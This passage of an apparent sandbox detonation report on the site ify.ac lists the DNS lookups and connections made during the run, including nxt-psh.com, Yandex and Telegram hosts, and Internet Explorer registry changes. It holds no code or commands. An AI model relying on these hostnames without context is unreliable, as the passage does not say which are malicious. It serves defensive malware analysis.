| GB | 104.86.111.145:80 | r10.o.lencr.org | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 1.1.1.1:53 | location.services.mozilla.com | udp |
| US | 1.1.1.1:53 | location.services.mozilla.com | udp |
| US | 1.1.1.1:53 | detectportal.firefox.com | udp |
| US | 1.1.1.1:53 | detectportal.firefox.com | udp |
| US | 1.1.1.1:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 34.107.221.82:80 | detectportal.firefox.com | tcp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | www.mozilla.org | udp |
| US | 1.1.1.1:53 | www.mozilla.org | udp |
| US | 1.1.1.1:53 | www.mozorg.moz.works | udp |
| GB | 143.204.72.186:443 | www.mozilla.org | tcp |
| US | 1.1.1.1:53 | example.org | udp |
| US | 1.1.1.1:53 | example.org | udp |
| US | 1.1.1.1:53 | ipv4only.arpa | udp |
| US | 1.1.1.1:53 | ipv4only.arpa | udp |
| US | 34.107.221.82:80 | detectportal.firefox.com | tcp |
| US | 1.1.1.1:53 | r11.o.lencr.org | udp |
| US | 1.1.1.1:53 | r11.o.lencr.org | udp |
| GB | 2.18.66.17:80 | r11.o.lencr.org | tcp |
| US | 1.1.1.1:53 | contile.services.mozilla.com | udp |
| US | 1.1.1.1:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 172.67.211.171:443 | ify.ac | udp |
| US | 1.1.1.1:53 | spocs.getpocket.com | udp |
| US | 1.1.1.1:53 | spocs.getpocket.com | udp |
| US | 1.1.1.1:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| US | 1.1.1.1:53 | oasqi.nxt-psh.com | udp |
| US | 1.1.1.1:53 | oasqi.nxt-psh.com | udp |
| US | 1.1.1.1:53 | mc.yandex.ru | udp |
| US | 1.1.1.1:53 | mc.yandex.ru | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 1.1.1.1:53 | getpocket.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | getpocket.cdn.mozilla.net | udp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| RU | 87.250.250.119:443 | mc.yandex.ru | tcp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 1.1.1.1:53 | nxt-psh.com | udp |
| US | 1.1.1.1:53 | nxt-psh.com | udp |
| US | 104.21.20.211:443 | nxt-psh.com | tcp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 104.21.20.211:443 | nxt-psh.com | udp |
| US | 1.1.1.1:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | o.pki.goog | udp |
| US | 1.1.1.1:53 | o.pki.goog | udp |
| GB | 142.250.187.195:80 | o.pki.goog | tcp |
| US | 1.1.1.1:53 | img-getpocket.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | img-getpocket.cdn.mozilla.net | udp |
| GB | 142.250.187.195:80 | o.pki.goog | tcp |
| US | 34.120.237.76:443 | img-getpocket.cdn.mozilla.net | tcp |
| US | 34.120.237.76:443 | img-getpocket.cdn.mozilla.net | tcp |
| US | 34.120.237.76:443 | img-getpocket.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| RU | 87.250.250.119:443 | mc.yandex.com | tcp |
| US | 1.1.1.1:53 | tiles-cdn.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 1.1.1.1:53 | tiles-cdn.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.36.165.17:443 | tiles-cdn.prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.36.165.17:443 | tiles-cdn.prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | www.gloucestershirelive.co.uk | udp |
| US | 1.1.1.1:53 | www.gloucestershirelive.co.uk | udp |
| US | 1.1.1.1:53 | www.mozorg.moz.works | udp |
| US | 1.1.1.1:53 | getpocket.com | udp |
| US | 1.1.1.1:53 | getpocket.com | udp |
| US | 1.1.1.1:53 | www.telegraph.co.uk | udp |
| US | 1.1.1.1:53 | www.telegraph.co.uk | udp |
| US | 1.1.1.1:53 | www.amazon.co.uk | udp |
| US | 1.1.1.1:53 | www.amazon.co.uk | udp |
| US | 1.1.1.1:53 | uk.hotels.com | udp |
| US | 1.1.1.1:53 | uk.hotels.com | udp |
| US | 1.1.1.1:53 | www.youtube.com | udp |
| US | 1.1.1.1:53 | www.youtube.com | udp |
| US | 1.1.1.1:53 | www.facebook.com | udp |
| US | 1.1.1.1:53 | e8153.a.akamaiedge.net | udp |
| US | 1.1.1.1:53 | www.facebook.com | udp |
| US | 1.1.1.1:53 | www.reddit.com | udp |
| US | 1.1.1.1:53 | www.reddit.com | udp |
| US | 1.1.1.1:53 | www.bbc.co.uk | udp |
| US | 1.1.1.1:53 | www.bbc.co.uk | udp |
| US | 1.1.1.1:53 | www.ebay.co.uk | udp |
| US | 1.1.1.1:53 | www.ebay.co.uk | udp |
| US | 1.1.1.1:53 | reddit.map.fastly.net | udp |
| US | 1.1.1.1:53 | gtm-uk.www.bbc.co.uk.pri.bbc.co.uk | udp |
| US | 1.1.1.1:53 | e11847.a.akamaiedge.net | udp |
| US | 1.1.1.1:53 | shavar.services.mozilla.com | udp |
| US | 1.1.1.1:53 | shavar.services.mozilla.com | udp |
| US | 1.1.1.1:53 | shavar.prod.mozaws.net | udp |
| US | 1.1.1.1:53 | normandy.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | normandy.cdn.mozilla.net | udp |
| US | 44.242.121.21:443 | shavar.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | normandy-cdn.services.mozilla.com | udp |
| US | 35.201.103.21:443 | normandy.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | push.services.mozilla.com | udp |
| US | 1.1.1.1:53 | push.services.mozilla.com | udp |
| US | 1.1.1.1:53 | autopush.prod.mozaws.net | udp |
| US | 1.1.1.1:53 | autopush.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | classify-client.services.mozilla.com | udp |
| US | 1.1.1.1:53 | classify-client.services.mozilla.com | udp |
| US | 1.1.1.1:53 | prod-classifyclient.normandy.prod.cloudops.mozgcp.net | udp |
| US | 1.1.1.1:53 | incoming.telemetry.mozilla.org | udp |
| US | 1.1.1.1:53 | incoming.telemetry.mozilla.org | udp |
| US | 34.98.75.36:443 | classify-client.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | telemetry-incoming.r53-2.services.mozilla.com | udp |
| US | 34.120.208.123:443 | incoming.telemetry.mozilla.org | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | fp2e7a.wpc.phicdn.net | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | udp |
| US | 1.1.1.1:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | telemetry-incoming.r53-2.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | time.com | udp |
| US | 1.1.1.1:53 | time.com | udp |
| US | 1.1.1.1:53 | www.theguardian.com | udp |
| US | 1.1.1.1:53 | www.theguardian.com | udp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | www.bbc.com | udp |
| US | 1.1.1.1:53 | www.bbc.com | udp |
| US | 1.1.1.1:53 | www.businessinsider.com | udp |
| US | 1.1.1.1:53 | www.businessinsider.com | udp |
| US | 1.1.1.1:53 | gtm-uk.www.bbc.com.pri.bbc.com | udp |
| US | 1.1.1.1:53 | f.shared.global.fastly.net | udp |
| US | 1.1.1.1:53 | theconversation.com | udp |
| US | 1.1.1.1:53 | theconversation.com | udp |
| US | 1.1.1.1:53 | www.mentalfloss.com | udp |
| US | 1.1.1.1:53 | www.mentalfloss.com | udp |
| US | 1.1.1.1:53 | www.timeout.com | udp |
| US | 1.1.1.1:53 | www.smithsonianmag.com | udp |
| US | 1.1.1.1:53 | www.smithsonianmag.com | udp |
| US | 1.1.1.1:53 | www.timeout.com | udp |
| US | 1.1.1.1:53 | slate.com | udp |
| US | 1.1.1.1:53 | slate.com | udp |
| US | 1.1.1.1:53 | www.gq-magazine.co.uk | udp |
| US | 1.1.1.1:53 | www.gq-magazine.co.uk | udp |
| US | 1.1.1.1:53 | www.refinery29.com | udp |
| US | 1.1.1.1:53 | www.refinery29.com | udp |
| US | 1.1.1.1:53 | m.sni.global.fastly.net | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 1.1.1.1:53 | fp2e7a.wpc.phicdn.net | udp |
| US | 1.1.1.1:53 | www.independent.co.uk | udp |
| US | 1.1.1.1:53 | www.stylist.co.uk | udp |
| US | 1.1.1.1:53 | www.stylist.co.uk | udp |
| US | 1.1.1.1:53 | www.independent.co.uk | udp |
| US | 1.1.1.1:53 | ciscobinary.openh264.org | udp |
| US | 1.1.1.1:53 | ciscobinary.openh264.org | udp |
| GB | 88.221.134.155:80 | ciscobinary.openh264.org | tcp |
| US | 1.1.1.1:53 | psyche.co | udp |
| US | 1.1.1.1:53 | psyche.co | udp |
| US | 1.1.1.1:53 | www.reuters.com | udp |
| US | 1.1.1.1:53 | www.reuters.com | udp |
| US | 1.1.1.1:53 | www.vox.com | udp |
| US | 1.1.1.1:53 | www.theatlantic.com | udp |
| US | 1.1.1.1:53 | www.theatlantic.com | udp |
| US | 1.1.1.1:53 | www.vox.com | udp |
| US | 1.1.1.1:53 | na-eu.atlanticmedia.map.fastly.net | udp |
| US | 1.1.1.1:53 | n.sni.global.fastly.net | udp |
| US | 1.1.1.1:53 | services.addons.mozilla.org | udp |
| US | 1.1.1.1:53 | services.addons.mozilla.org | udp |
| GB | 18.245.162.105:443 | services.addons.mozilla.org | tcp |
| US | 1.1.1.1:53 | versioncheck-bg.addons.mozilla.org | udp |
| US | 1.1.1.1:53 | versioncheck-bg.addons.mozilla.org | udp |
| US | 34.160.90.233:443 | versioncheck-bg.addons.mozilla.org | tcp |
| US | 34.160.90.233:443 | versioncheck-bg.addons.mozilla.org | udp |
| US | 1.1.1.1:53 | addons.mozilla.org | udp |
| US | 1.1.1.1:53 | addons.mozilla.org | udp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| GB | 13.224.132.43:443 | addons.mozilla.org | tcp |
| US | 1.1.1.1:53 | safebrowsing.googleapis.com | udp |
| US | 1.1.1.1:53 | safebrowsing.googleapis.com | udp |
| GB | 142.250.200.10:443 | safebrowsing.googleapis.com | tcp |
| GB | 142.250.187.195:80 | o.pki.goog | tcp |
| GB | 142.250.200.10:443 | safebrowsing.googleapis.com | udp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | t.me | udp |
| US | 1.1.1.1:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 1.1.1.1:53 | ocsp.godaddy.com.akadns.net | udp |
| US | 1.1.1.1:53 | telegram.org | udp |
| US | 1.1.1.1:53 | telegram.org | udp |
| US | 1.1.1.1:53 | cdn5.cdn-telegram.org | udp |
| US | 1.1.1.1:53 | cdn5.cdn-telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 34.111.108.175:443 | cdn5.cdn-telegram.org | tcp |
| US | 1.1.1.1:53 | ocsp.godaddy.com.akadns.net | udp |
| US | 34.111.108.175:443 | cdn5.cdn-telegram.org | udp |
| US | 1.1.1.1:53 | detectportal.firefox.com | udp |
| US | 1.1.1.1:53 | detectportal.firefox.com | udp |
| US | 1.1.1.1:53 | ipv4only.arpa | udp |
| US | 1.1.1.1:53 | ipv4only.arpa | udp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | firefox.settings.services.mozilla.com | udp |
| US | 1.1.1.1:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 1.1.1.1:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-14 17:56
Reported
2024-07-14 17:56
Platform
win7-20240708-en
Max time kernel
9s
Max time network
11s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "12" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "851" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "9" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "119" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "90" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "851" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "0" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "119" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "851" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "12" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "508" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "62" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "105" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "105" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "9" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "90" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "105" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "508" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "508" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "12" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "41" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "62" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "0" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\ = "90" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "119" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "9" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\ify.ac\Total = "41" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "41" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "62" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
